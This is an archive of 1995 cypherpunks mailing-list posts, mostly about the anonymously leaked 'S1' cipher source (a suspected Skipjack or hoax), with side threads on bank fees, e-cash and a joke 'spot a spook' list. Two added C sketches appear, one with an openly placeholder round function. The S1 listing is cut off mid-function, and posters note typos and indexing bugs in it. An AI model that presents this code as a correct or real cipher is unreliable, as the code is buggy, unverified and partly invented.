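The structure described in the message above, as an added C sketch that is not part of the post or of the posted "S1" source: it checks a 5-entry form of G0 against the quoted period-10 pattern, and runs the 32-iteration update pattern to show that it inverts for any round function and touches each piece 8 times. The round function and subkey selection (placeholder_mix and the key indexing) are hypothetical stand-ins, because the message does not say how F, G and the key are combined.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* G0 as quoted in the message: a 10-entry pattern repeated over all inputs. */
static const uint8_t G0_PERIOD[10] = {0, 0, 1, 1, 0, 1, 1, 0, 0, 1};

uint8_t g0_table(uint8_t i) { return G0_PERIOD[i % 10]; }

/* Concise form: a 5-entry base, complemented on every second group of five. */
uint8_t g0_concise(uint8_t i) {
    static const uint8_t base[5] = {0, 0, 1, 1, 0};
    return (uint8_t)(base[i % 5] ^ ((i / 5) & 1));
}

/* Returns 1 if the two forms agree on all 256 inputs. */
int g0_forms_agree(void) {
    for (int i = 0; i < 256; i++)
        if (g0_table((uint8_t)i) != g0_concise((uint8_t)i)) return 0;
    return 1;
}

/* Update pattern from the message: target piece, then its four source pieces. */
struct step { uint8_t target; uint8_t src[4]; };
static const struct step SCHEDULE[8] = {
    {6, {4, 5, 2, 3}}, {7, {4, 5, 0, 1}},
    {0, {6, 7, 4, 5}}, {1, {6, 7, 2, 3}},
    {2, {0, 1, 6, 7}}, {3, {0, 1, 4, 5}},
    {4, {2, 3, 0, 1}}, {5, {2, 3, 6, 7}},
};

#define ROUNDS 32 /* loop iterations; two pieces are updated per iteration */

/* HYPOTHETICAL stand-in for the real F/G/key combination, which the message
 * does not give. Any function of the source pieces and key would do here. */
static uint8_t placeholder_mix(const uint8_t b[8], const struct step *s, uint8_t k) {
    uint8_t x = (uint8_t)(b[s->src[0]] ^ k);
    x = (uint8_t)(x * 167u + b[s->src[1]]);
    x ^= (uint8_t)((b[s->src[2]] << 3) | (b[s->src[3]] >> 5));
    return (uint8_t)(x ^ g0_concise(x));
}

/* One piece update. The target never appears among its own sources, so
 * XORing the same value again undoes the step. Key indexing is hypothetical. */
static void apply_step(uint8_t b[8], const uint8_t key[10], int round, int j) {
    const struct step *s = &SCHEDULE[2 * (round % 4) + j];
    b[s->target] ^= placeholder_mix(b, s, key[(2 * round + j) % 10]);
}

void encrypt_block(uint8_t b[8], const uint8_t key[10]) {
    for (int r = 0; r < ROUNDS; r++) {
        apply_step(b, key, r, 0);
        apply_step(b, key, r, 1);
    }
}

/* Decryption replays the same steps in the inverse order. */
void decrypt_block(uint8_t b[8], const uint8_t key[10]) {
    for (int r = ROUNDS - 1; r >= 0; r--) {
        apply_step(b, key, r, 1);
        apply_step(b, key, r, 0);
    }
}

/* How many times each of the 8 pieces is modified over the 32 iterations. */
void count_modifications(int counts[8]) {
    memset(counts, 0, 8 * sizeof counts[0]);
    for (int r = 0; r < ROUNDS; r++)
        for (int j = 0; j < 2; j++)
            counts[SCHEDULE[2 * (r % 4) + j].target]++;
}

/* Round-trip over a constructed 80-bit key and 64-bit block. */
int roundtrip_ok(void) {
    const uint8_t key[10] = {0x10, 0x32, 0x54, 0x76, 0x98,
                             0xba, 0xdc, 0xfe, 0x01, 0x23}; /* constructed */
    const uint8_t plain[8] = {'S', '1', ' ', 'b', 'l', 'o', 'c', 'k'};
    uint8_t buf[8];
    memcpy(buf, plain, sizeof buf);
    encrypt_block(buf, key);
    decrypt_block(buf, key);
    return memcmp(buf, plain, sizeof buf) == 0;
}

int main(void) {
    int counts[8];
    count_modifications(counts);
    printf("G0 forms agree: %d\n", g0_forms_agree());
    printf("round-trip ok:  %d\n", roundtrip_ok());
    for (int i = 0; i < 8; i++)
        printf("piece %d modified %d times\n", i, counts[i]);
    return 0;
}
```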




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 9 Aug 95 16:11:36 PDT
To: cypherpunks@toad.com
Subject: Re:  "S1" encryption system
Message-ID: <199508092310.QAA11567@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Correction, I just noticed that the four F functions have 4 bit output
not 8 as I wrote.  Realize that all this is based on a very cursory
examination of the code.
 
BTW I just was starting to look at the key scheduling and I noticed that
fullkey is indexed in its 2nd slot by i*2 where i goes from 0 to 31, but
is only declared as being 32 in size in that slot.  So I think this is
another typo, probably the index should be i.  This kind of thing does
not inspire confidence...
 
Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Wed, 9 Aug 95 00:09:42 PDT
To: cypherpunks@toad.com
Subject: Re: How To Spot a Spook page
In-Reply-To: <199508090550.AAA07775@arnet.arn.net>
Message-ID: <Pine.SUN.3.91.950809170713.24119G-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 9 Aug 1995, David K. Merriman wrote:

> As a start on a Web page, here are some things I thought of. What else? What
> are the initials of some of the world's intelligence groups (CIA, NSA, KGB,
> DGI, MI5(?), ???)

In Australia: ASIO, ASIS, JIO, could be more...

> 1> Antennas - more than TV/Ham/CB/Satellite (or 'unusually' shaped antennas).

You should see some of the ones I've built...

> 2> No, or *very* few, visitors (esp. kids)

I don't encourage visitors.

> 3> Visitors are seldom the same, or almost always the same.

But the same ones arrive anyway.

> 4> Doesn't talk about job/company.

I rarely discuss my job.

> 5> Activity at 'unusual' times.

I work funny hours at times.

> 6> Not very 'sociable' (keep to themselves).

That's me.

Oh dear, I've blown my cover...

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2DAA.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | D8 15 71 F9 26 C8 63 40  5E 63 5C 65 FC A0 22 99





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 9 Aug 95 18:34:58 PDT
To: Matt Blaze <cypherpunks@toad.com
Subject: This summer's special delivery?
Message-ID: <ac4eb0c9030210046e6c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:59 PM 8/9/95, Matt Blaze wrote:

>Someone sent me (to my bell labs address) a copy of this this afternoon via
>an anon server in the netherlands.  It looks like others got it as well, and
>it appears to have been posted to the cypherpunks list, though it hasn't
>yet shown up here from the list (my mail seems to be slow today).  Did
>anyone else have a copy mailed directly to them?

I got a copy mailed to me directly as well. I don't know why he/she/it sent
it me, but I got it.

I have nothing further to add on this. But recall that it was just about
this time last year--just before Crypto--that the "alleged RC4 code" was
posted anonymously to the list.

Hmmhhh....

--Tim May

Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 9 Aug 95 16:06:07 PDT
To: Cypherpunks List <cypherpunks@toad.com>
Subject: Bank Fees and E-Cash
Message-ID: <Pine.SUN.3.91.950809190129.17834A-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

- - - Bank Fees and the E-cash Niche.

Banks have gorged themselves on rocketing fees for the last five 
years.  The result is that the typical bank customer currently pays 
150% of the amount of interest collected on accounts in a given 
year in the form of fees.  My prediction, and my hope, is that e-
cash will cut through the pretense upon which the rationalization 
of many of these fees is based, and even market itself on this 
point- Lower Fees.


- - - New Fee Schemes

"Overdraft Assistance" and the Myth That Only Irresponsible Bank 
Customers Bounce Checks or Overdraft.

Banks have begun to implement policies intended to help the 
customer overdraft.  They may, for example, cash the largest 
checks first such that an overdraft will hit with several small 
checks rather than one or two large ones causing multiple 
overdraft fees.  Banks have begun to routinely delay crediting 
checks for 48 and 72 hours, and out of state checks for anywhere 
from 3-14 business days.  ATM cash deposits are typically subject 
to 24-48 hours delay.

The "Unofficial Credit."

Many times the delays in crediting various transactions are hidden 
by the "unofficial credit."  Most noticeable in ATM deposits, a 
credit is given but should demands on the account draw into the 
"unofficial credit" an overdraft will be posted on the rationale 
that an "official credit" has not yet been posted and the funds 
are thus not "officially" available, this despite the fact that 
the funds will appear available to ATM balance requests and 
statements.  Of course the bank will profit from the "unofficial 
credit" to "official credit" interest float regardless of what 
overdraft fees might be charged.
The "wire credit" and "official wire credit" are another example.  
Banks receive a wire transfer on Monday, send an "electronic 
payment advice" the same day, but post the credit to the account 
"officially" on Tuesday.  The original intent is for the bank to 
be able to take advantage of the interest "float" between the 
receipt of funds and its credit to the account.  The result is an 
additional overdraft potential.

The Separate Wire Office Hours.

Often times the bank's "wire" office will close hours before the 
branch closes.  Wires received some hours before closing on Friday 
will not be credited until the following Monday.

The ATM Processing Time Table.

Many banks only begin processing ATM deposit transactions an hour 
before closing, crediting only as many deposits as can be 
processed in this time, the remainder are not processed until the 
next morning.  ATM debits are, of course, processed all day.

Check Processing Time Table.

In a given day, debit checks are processed on an account before 
deposit checks are processed.  Obviously, an account that 
overdrafts overdrafts only because of the order in which checks 
are processed.


- - - The Created Convenience Fee

A great many bank fees fall into what I call "created convenience 
fees."  Really created convenience fees resemble airport customs 
bribes in third world countries.  The customs officer makes what 
should be an easy passage terribly difficult, then demands a "fee" 
to make travel as easy as it should have been to begin with.  The 
net effect is for the traveler to pay to dispense with a problem 
created by the party receiving the fee.

Nigeria is a prime example.  Upon arrival the average traveler 
will find him or herself embroiled with licensing deficiencies, 
visa fees, entry fees, the threat of quarantine, seizure of 
expensive equipment for "inspection" and other such invented 
requirements.  Some hours into the "negotiations" the customs 
official will offer to "overlook" these transgressions for a 
"fee."  This is a created convenience fee.

Banks fall into this category by such programs as "overdraft 
insurance" whereby banks enact policies which, as we have seen, 
make it painfully easy to overdraft and then charge a monthly fee 
to avoid the overdraft charges.

- - - The Result

Bob is a sort of combination of my own experience and discussions 
with other bank customers in D.C.

Bob has an account in Washington, D.C. with $1500.00 in it.
Bob Receives a wire at 3pm Friday for $1700.00
Bob writes five checks on Friday, one for $1400.00, one for
  $200.00, one for $150.00 and two for $100.00.  Totaling
  $1950.00.
Bob deposits 4 checks totaling $2000.00 in the night depository
  Saturday.
Bob deposits $50.00 in cash in an ATM on Saturday Night.
Bob checks his ATM balance ($3250.00) and withdraws $50.00 from an
  ATM on Sunday Morning.

Bob's wire arrives after the wire office has closed for the day - 
  an "unofficial credit" is posted Friday before closing anyhow.
Bob's bank processes the $1400.00 check first, leaving Bob's
  account with an "official" $100.00 and $1700.00 in "unofficial
  funds."
Bob's bank processes the $200.00 check, notes a $100.00 overdraft,
  charges $25.00 for this check, refuses payment on the remaining
  three checks and drops a $25.00 overdraft fee plus a $10.00 "bad
  check" fee for each.  Total charges:  $130.00
Bob's bank processes the $50.00 ATM withdrawal, which overdrafts.
  $25.00 fee is posted.  Total fees so far:  $155.00.
Bob's balance for the majority of Monday:  -$255.00.

Bob's bank begins to process deposits, notes all the checks for
  deposit, $1000.00 of which are out of state.  No checks are
  credited.
Bob's bank notes the ATM transaction at the end of the day on
  Monday, but does not credit it immediately despite the fact that
  it is cash.
Bob's bank credits the ATM deposit to Bob's account on Tuesday.
Bob's balance is now -$205.00  Middle of the day Tuesday, Bob's
  account has been below its required minimum $500 balance for 24 
  hours.  A $50.00 fee is charged.  End of the day Bob's wire is 
  "officially" credited - a $10.00 fee is charged for receiving 
  the wire. (No, I'm not kidding)
Bob's bank credits the $1000.00 of in state checks on Wednesday
Finally, on Friday, Bob's out of state checks are deposited.

Bob will likely be liable for $50.00-$75.00 fees for each of his 
bounced checks as vendors will probably charge hefty fees.

Telecheck will have Bob on the 10 most wanted list for $350.00 in 
bounced checks.  Bob's check writing ability is about nil in D.C. 
for the month it will take him to clear it up.

Bob gets a mailing a week later telling him of the advantages of 
his bank's newest "overdraft insurance" program.  $150 a year.

Bob, for what would literally be a series of very responsible 
transactions, is looking at over $215.00 in bank fees, and at 
least $150 in bounced check fees from vendors because of violation 
of technical rules the bank has designed to cause fees to be 
charged.

- - - E-Cash

I cannot believe that e-cash won't be able to solve some of these 
problems, and I hope it will limit its own fees to usage.  To me 
this is a classic argument for small house e-cash shops.  Citibank 
and Mastercard are going to fight for their fees.




00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@telecheck.com
Date: Wed, 9 Aug 95 17:05:47 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: Bank Fees and E-Cash
In-Reply-To: <Pine.SUN.3.91.950809190129.17834A-100000@access5.digex.net>
Message-ID: <9508100004.AA03734@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text/plain



I have no love for most banks, and have experienced your scenario on at
least two separate times...  In fact, I tried to deposit a cashiers
check from another bank to open a CD in one bank, and they had to "hold"
the check for one week.  I can imagine holding it so I don't start
forging checks on a forged cashiers check, but on a 30 day CD?  Ugh.

unicorn@access.digex.net said:
> Banks have gorged themselves on rocketing fees for the last five  
> years.  The result is that typical bank customer currently pays  150% 
> of the amount of interest collected on accounts in a given  year in 
> the form of fees.  My prediction, and my hope, is that e-cash will 
> cut through the pretense upon which the rationalization  of many of 
> these fees is based, and even market itself on this  point- Lower 
> Fees. 

My bank charges me a flat rate of $2/month +$1/month for producing
an image copy of my checks.  It took me a while to find it, but I
did.  It's called shopping.

<snip>

unicorn@access.digex.net said:
> Telecheck will have Bob on the 10 most wanted list for $350.00 in  
> bounced checks.  Bob's check writing ability is about nil in D.C.  
> for the month it will take him to clear it up. 

Not to pick nits, but TeleCheck probably won't get involved until
1-2 months after the checks were bounced (UNLESS the checks are reported
stolen, then we will attempt to shut you down), and usually only if the 
merchants were guarantee customers (we will pay the merchant for
a bad check he/she accepts based on a TeleCheck approval).  Furthermore,
if you write a bad check on a customer of SCAN (TeleCheck's evil
competitor), we won't think twice about you.  

Secondly, most banks will automatically resubmit checks several
times to cover temporary shortfalls.

unicorn@access.digex.net said:
> I cannot believe that e-cash won't be able to solve some of these  
> problems, and I hope it will limit its own fees to usage.  To me  
> this is a classic argument for small house e-cash shops.  Citibank  
> and Mastercard are going to fight for their fees. 

Unfortunately, what most people term e-cash isn't e-cash.  The problems
associated with bringing up the electronic equivalent of cash are
gigantic.  I for one, have a newfound respect for Chaum and the rest of
the pioneers in the field.

Citibank and MasterCard are developing "internet" ways for you to use
your credit cards, not e-cash.  Microsoft is developing ways to pipe that
information to them.  These are not going to solve the problem, especially
at 18.9% A.P.R...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jason Burrell" <jburrell@crl.com>
Date: Wed, 9 Aug 95 17:33:12 PDT
To: merriman@arn.net (David K. Merriman)
Subject: Re: How To Spot a Spook page
In-Reply-To: <199508090550.AAA07775@arnet.arn.net>
Message-ID: <199508100020.TAA02354@crl.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> As a start on a Web page, here are some things I thought of. What else? What
> are the initials of some of the world's intelligence groups (CIA, NSA, KGB,
> DGI, MI5(?), ???)
> 
> 1> Antennas - more than TV/Ham/CB/Satellite (or 'unusually' shaped antennas).

Well, no, but I do have access to a lot of computer equipment(*) and some 
'unusual' connectivity software floating around.

* - The 'good' powered stuff isn't here; just this thing that runs like a
486/10 on valium.

> 2> No, or *very* few, visitors (esp. kids)

I seldom have any visitors to speak of here.

> 3> Visitors are seldom the same, or almost always the same.

That describes me perfectly.

> 4> Doesn't talk about job/company.

I don't.

> 5> Activity at 'unusual' times.

The times for much of my activity could be described as quite unusual.

> 6> Not very 'sociable' (keep to themselves).

That's definitely me. Ask anyone who knows me.

> Or, tell me to forget it, it doesn't belong here.... :-/
> 
> Dave

I guess this proves I'm a spook. My friends probably suspected as much... :-)

You know, now that I think about it, I probably *am* quite "mysterious" 
to the great majority of people who know of me personally (off-net), for a 
variety of reasons.

--
PGP public key available via finger.	      
GCS/M/S d>++ s: a--- C++++ UL++++ P+ L++++ E- W+(++) N+++ 
K+++ w--- O- M-- V-- PS+++ PE+ Y++ PGP++(+++) t 5+++ X+ 
R+++ tv+ b+ DI(+) D G+++ e>+++++ h+ r y?



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Wed, 9 Aug 95 16:49:53 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Crypto = Competitive Advantage?
In-Reply-To: <199508091417.KAA17510@panix.com>
Message-ID: <TAA08200.199508092349@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199508091417.KAA17510@panix.com>, Duncan Frissell writes:
>Note to Mr. Bill -
>
>I was watching CNBC this morning while reading my mail and they had a story
>on the Netscape Communications IPO (ticker NSCP btw).  Some analyst said
>when asked whether Microsoft couldn't just wipe them out that the most
>important part of Netscape's product was that it offered end-to-end
>encryption.  He said that this was important for the growth of the nets and
>was something that people wanted.
[...]

He may or may not be right that end-to-end encryption is important, but:

(a) Netscape has documented exactly how SSL should work, and
(b) Microsoft can licence RC4 and RSA from PKP just as well as
Netscape can.

In addition it is far from clear that SSL will be the winning
end-to-end encryption in the web world ('tho it looks that way
at the moment - a few well publicised attacks - say one against
the 40bit keys, and say a man-in-the-middle may make S-HTTP, or
PGP-HTTP look a lot better than SSL to the public - or it may not).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Wed, 9 Aug 95 16:51:42 PDT
To: cypherpunks@toad.com
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
In-Reply-To: <199508092259.PAA10092@jobe.shell.portal.com>
Message-ID: <199508100000.UAA07792@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
>I suppose the unstated implication is that this might be Skipjack.
>
>I have looked at the program a bit and have a few observations:
>
....
>The encryption function itself is a modified Feistel type cipher, with
>the blocks broken into 8 pieces and xor'd with functions involving F,
...

Someone sent me (to my bell labs address) a copy of this this afternoon via
an anon server in the netherlands.  It looks like others got it as well, and
it appears to have been posted to the cypherpunks list, though it hasn't
yet shown up here from the list (my mail seems to be slow today).  Did
anyone else have a copy mailed directly to them?

I don't quite know what to make of it.  A couple of random quick first-order
observations:

	The code appears to have been translated from some other
	language by someone not skilled in C.  Hal noted the
	lack of "for" loops where they are obviously called for,
	and at least two odd bits of code that appear to be bugs,
	at least one of which one would suspect would cause it to
	fail to interoperate with correct implementations (if we
	are to assume the "correct" cipher uses the entire key schedule).
	Also note the awkward assignment to the F and G tables.

	S1 could suggest Skipjack, but it is also a pretty generic name
	for a cryptosystem.

	I thought Skipjack (like most other NSA cryptosystems) is SECRET,
	not TOP SECRET, but on the other hand this appears to be part of
	some kind of "secondary analysis" package, whatever that is, so
	if this is really spook stuff, the TOP SECRET designation could
	be reasonable.

	The cipher is similar in some ways to one designed by Bruce
	Schneier and me last year (MacGuffin, described in
	ftp://research.att.com/dist/mab/mcg.ps ).  In particular, note
	that in each of the 32 rounds, 16 bits are operated on by 48
	(or 40, depending on the effect of the G function).

	There is at least one novel feature - the G function used to
	select which F's (Sboxes) to use.  I've not seen this before.

	The cipher appears to be designed for software implementation
	(byte oriented, etc.).  The software, on the other hand,
	goes to some trouble to emulate a hardware interface, as if it
	were written to be dropped in to some pre-existing code or
	library.

	The F outputs are not uniformly distributed.  In fact, some outputs
	appear far more often than others (I base this on running "grep|wc",
	not on any real analysis.)

	What a strange key schedule.

	The "family" XOR business at the beginning and end suggests
	RSA's DESX.  The language in the comments suggests that it's there
	to allow for non-interoperable "families" of users.  GOST
	has similar features, though GOST couples this more closely to
	the cipher's internal structure.

	As far as I know, no one has EVER leaked TOP SECRET material
	cryptosystem in this way, so I'm very skeptical.  But there's
	always a first time.

I don't know what to believe.  If this is a real, classified cryptosystem,
it would be a very unusual first.  On the other hand, if this is a hoax,
whoever did it appears to have gone to some trouble, and has included some
interesting design features.  A third possibility, if we are to believe
the spook markings, is that it is a re-implementation of someone else's
cryptosystem, created for the purpose of cryptanalysis.

All in all, I remain very skeptical.  It smells like a hoax to me, but
I'm willing to look at it with an open mind.

-matt
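
The tally behind the "grep|wc" remark in the message above, as an added example (not part of the original message and not code from the posted listing): it parses `F[t][i] = 0NN;` assignment lines, counts how often each 4-bit output occurs, and computes a chi-square statistic against a uniform table. The names `analyse_f_table` and `f_stats` are assumptions made here, and the embedded sample is only the first 32 F[0] entries of the listing posted to the list.

```c
#include <stdio.h>
#include <string.h>

#define OUTPUTS 16              /* F entries are 4-bit values, 00..017 octal */

/* First 32 F[0] assignments, copied from the posted listing with the octal
   literals kept as posted. A 32-of-256 sample, used here only as input. */
static const char SAMPLE[] =
    "\tF[0][0] = 07;\n\tF[0][1] = 02;\n"
    "\tF[0][2] = 011;\n\tF[0][3] = 014;\n"
    "\tF[0][4] = 010;\n\tF[0][5] = 016;\n"
    "\tF[0][6] = 01;\n\tF[0][7] = 06;\n"
    "\tF[0][8] = 015;\n\tF[0][9] = 02;\n"
    "\tF[0][10] = 00;\n\tF[0][11] = 04;\n"
    "\tF[0][12] = 017;\n\tF[0][13] = 07;\n"
    "\tF[0][14] = 03;\n\tF[0][15] = 017;\n"
    "\tF[0][16] = 010;\n\tF[0][17] = 017;\n"
    "\tF[0][18] = 012;\n\tF[0][19] = 05;\n"
    "\tF[0][20] = 013;\n\tF[0][21] = 00;\n"
    "\tF[0][22] = 017;\n\tF[0][23] = 02;\n"
    "\tF[0][24] = 05;\n\tF[0][25] = 015;\n"
    "\tF[0][26] = 017;\n\tF[0][27] = 017;\n"
    "\tF[0][28] = 011;\n\tF[0][29] = 011;\n"
    "\tF[0][30] = 06;\n\tF[0][31] = 014;\n";

struct f_stats {
    int n;                      /* entries tallied; -1 if a value is outside 0..15 */
    unsigned counts[OUTPUTS];   /* occurrences of each output value */
    unsigned min, max;          /* rarest and most common output counts */
    int balanced;               /* 1 if every output occurs exactly n/16 times */
    double chi2;                /* chi-square vs. uniform, 15 degrees of freedom */
};

/* Tally the outputs assigned to F[table] in C source text `src`. */
struct f_stats analyse_f_table(const char *src, int table)
{
    struct f_stats s;
    int v;

    memset(&s, 0, sizeof s);
    while (*src) {
        char line[128];
        size_t len = strcspn(src, "\n");
        size_t copy = len < sizeof line - 1 ? len : sizeof line - 1;
        int t, idx, val;

        /* Work on one line at a time so a blank line cannot be skipped over. */
        memcpy(line, src, copy);
        line[copy] = '\0';
        /* %i honours the leading 0, so "017" is read as octal (15). */
        if (sscanf(line, " F[%d][%d] = %i;", &t, &idx, &val) == 3 && t == table) {
            if (val < 0 || val >= OUTPUTS) { s.n = -1; return s; }
            s.counts[val]++;
            s.n++;
        }
        src += len;
        if (*src == '\n') src++;
    }
    if (s.n == 0) return s;

    s.min = s.max = s.counts[0];
    s.balanced = 1;
    for (v = 0; v < OUTPUTS; v++) {
        double expected = (double)s.n / OUTPUTS;
        double d = s.counts[v] - expected;
        if (s.counts[v] < s.min) s.min = s.counts[v];
        if (s.counts[v] > s.max) s.max = s.counts[v];
        if (s.counts[v] * OUTPUTS != (unsigned)s.n) s.balanced = 0;
        s.chi2 += d * d / expected;
    }
    return s;
}

int main(void)
{
    struct f_stats s = analyse_f_table(SAMPLE, 0);
    int v;

    for (v = 0; v < OUTPUTS; v++)
        printf("output %2d: %u\n", v, s.counts[v]);
    printf("n=%d min=%u max=%u balanced=%d chi2=%.2f\n",
           s.n, s.min, s.max, s.balanced, s.chi2);
    return 0;
}
```

The 32-entry sample is too small to draw conclusions from; pass the text of the full listing for each of the four tables to get the 256-entry counts. With 15 degrees of freedom the 5% critical value for the chi-square statistic is about 25.0.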




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 9 Aug 95 11:55:31 PDT
To: cypherpunks@toad.com
Subject: this looked like it might be interesting
Message-ID: <199508091852.UAA23821@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


it was on a floppy i got in the mail last week:

/* TOP SECRET                                                    */
/* See label file for codeword restrictions                      */

/*****************************************************************/
/* TOP SECRET                                                    */
/* See label file for codeword restrictions                      */
/*                                                               */
/* S-1 CIPHER ALGORITHM software chip simulator                  */
/*                                                               */
/* NOT INTENDED FOR EXTERNAL, PRODUCTION, OR CONTRACTOR USE OR   */
/* DISCLOSURE.                                                   */
/* NOT CERTIFIED OR APPROVED FOR USE AS REFERENCE.               */
/* FOR SECONDARY ANALYTIC USE ONLY.                              */
/*                                                               */
/* Basic chip functions. Block encryption methods are not        */
/* implemented.                                                  */
/*                                                               */
/* SOFTWARE HISTORY:                                             */
/* 1 FEBRUARY 1989 --- Submitted to source control.              */
/* 31 JULY 1991 --- Moved UFV support into basic functions.      */
/*                                                               */
/* TOP SECRET                                                    */
/* See label file for codeword restrictions                      */
/*****************************************************************/


/* local declarations are for ANSI C */
#include <stdio.h>
#include <string.h>	/* memcpy(), used by S1_load_key and S1_create_key */
#include <sys/types.h>

/* S-1 F table - these differ in the S-2 version */
static u_char F[4][256];
/* S-1 F selection (G) table */
static u_char G[2][256];

/* exported interface */

int S1_self_check(void);
int S1_zeroize(void);
int S1_load_key(int, u_char *);
int S1_encrypt_block(int, u_char *);
int S1_decrypt_block(int, u_char *);
int S1_create_key(u_char *, u_char *);


/* local functions */
static void f_initialize(void);
static void rotatekey(int, u_char *);
static u_char f(int,int);
static u_char g(int,int);


/* CHIP PARAMETERS */

#define KEYGEN_CHIP 1 /* delete this to simulate operational chipsets */
#define KEY_REGISTERS 4
#define INTEGRITY KEY_REGISTERS

/* user family vectors (UFV) */
static u_char clear_family[8] = {129,3,5,7,2,4,6,131};
static u_char cipher_family[8] = {1,254,253,252,128,129,130,8};

static u_char key_integrity_key[10] = {0,0,0,0,0,0,0,0,0,0};

static u_char key[KEY_REGISTERS+1][10];
static u_char fullkey[KEY_REGISTERS+1][32][6];  /* SOFTWARE ONLY */

static int initialized=0;

/* EXPORTED SIMULATED CHIP INTERFACE */
/* SEE NOTES FOR INTERFACE DESCRIPTIONS */


int S1_self_check()
{
	f_initialize();
	rotatekey(INTEGRITY,key_integrity_key);
	initialized=1;
	return 0;
}


int S1_zeroize()
{
	int i, j, k;

	i=0;
	while (i<KEY_REGISTERS+1) {
		j=0;
		while (j<10) {
			key[i][j] = 0;
			j=j+1;
		}
		j=0;
		while (j<32) {
			k=0;
			while (k<6) {
				fullkey[i][j][k] = 0;
				k++;
			}
			j=j+1;
		}
		i=i+1;
	}
	i=0;
	while (i<4) {
		j=0;
		while (j<256) {
			F[i][j] = 0;
			j++;
		}
		i++;
	}
	return 0;
}
	


int S1_load_key(int key_register, u_char *key_vector)
{
	u_char key_buffer[12];
	
	if (initialized == 0)
		return 1;
	if ((key_register < 0) || (key_register >= KEY_REGISTERS))
		return 9;
	memcpy(key_buffer,key_vector,12);
	S1_decrypt_block(INTEGRITY,key_buffer);
	S1_decrypt_block(INTEGRITY,key_buffer+4);
	if ((key_buffer[10] != 0) || (key_buffer[11] != 0))
		return 2;
	rotatekey(key_register,key_buffer);
	memcpy(key[key_register],key_buffer,10);
	return 0;
}


int S1_encrypt_block(int key_register, u_char *block)
{
	int r, startf, i;
	
	if (initialized == 0)
		return 1;
	i=0;
	while (i<8) {
		block[i] = block[i] ^ clear_family[i];
		i=i+1;
	}
	i=0;
	while (i<32) {
		r=i*2;
		startf = g(0,fullkey[key_register][r][0] ^ block[(r+4) % 8])
		       + g(1,fullkey[key_register][r][1] ^ block[(r+5) % 8])*2;
		block[(r+6) % 8] = block[(r+6) % 8]
			       ^ f(((startf+0) % 4),
				   fullkey[key_register][r][2]
				 ^ block[(r+2) % 8]);
		block[(r+6) % 8] = block[(r+6) % 8]
			       ^ (f(((startf+1) % 4),
				   fullkey[key_register][r][3]
				 ^ block[(r+3) % 8]) << 4);	
		block[(r+7) % 8] = block[(r+7) % 8]
			       ^ f(((startf+2) % 4),
				   fullkey[key_register][r][4]
				 ^ block[(r+0) % 8]);
		block[(r+7) % 8] = block[(r+7) % 8]
			       ^ (f(((startf+3) % 4),
				   fullkey[key_register][r][5]
				 ^ block[(r+1) % 8]) << 4);
		i = i+1;
	}
	i=0;
	while (i<8) {
		block[i] = block[i] ^ cipher_family[i];
		i=i+1;
	}
	return 0;
}


int S1_decrypt_block(int key_register, u_char *block)
{
	int r, startf, i;
	
	if (initialized == 0)
		return 1;
	i=0;
	while (i<8) {
		block[i] = block[i] ^ cipher_family[i];
		i=i+1;
	}
	i=32;
	while (i>0) {
		i = i-1;
		r=i*2;
		startf = g(0,fullkey[key_register][r][0] ^ block[(r+4) % 8])
		       + g(1,fullkey[key_register][r][1] ^ block[(r+5) % 8])*2;
		block[(r+6) % 8] = block[(r+6) % 8]
			       ^ f(((startf+0) % 4),
				   fullkey[key_register][r][2]
				 ^ block[(r+2) % 8]);
		block[(r+6) % 8] = block[(r+6) % 8]
			       ^ (f(((startf+1) % 4),
				   fullkey[key_register][r][3]
				 ^ block[(r+3) % 8]) << 4);	
		block[(r+7) % 8] = block[(r+7) % 8]
			       ^ f(((startf+2) % 4),
				   fullkey[key_register][r][4]
				 ^ block[(r+0) % 8]);
		block[(r+7) % 8] = block[(r+7) % 8]
			       ^ (f(((startf+3) % 4),
				   fullkey[key_register][r][5]
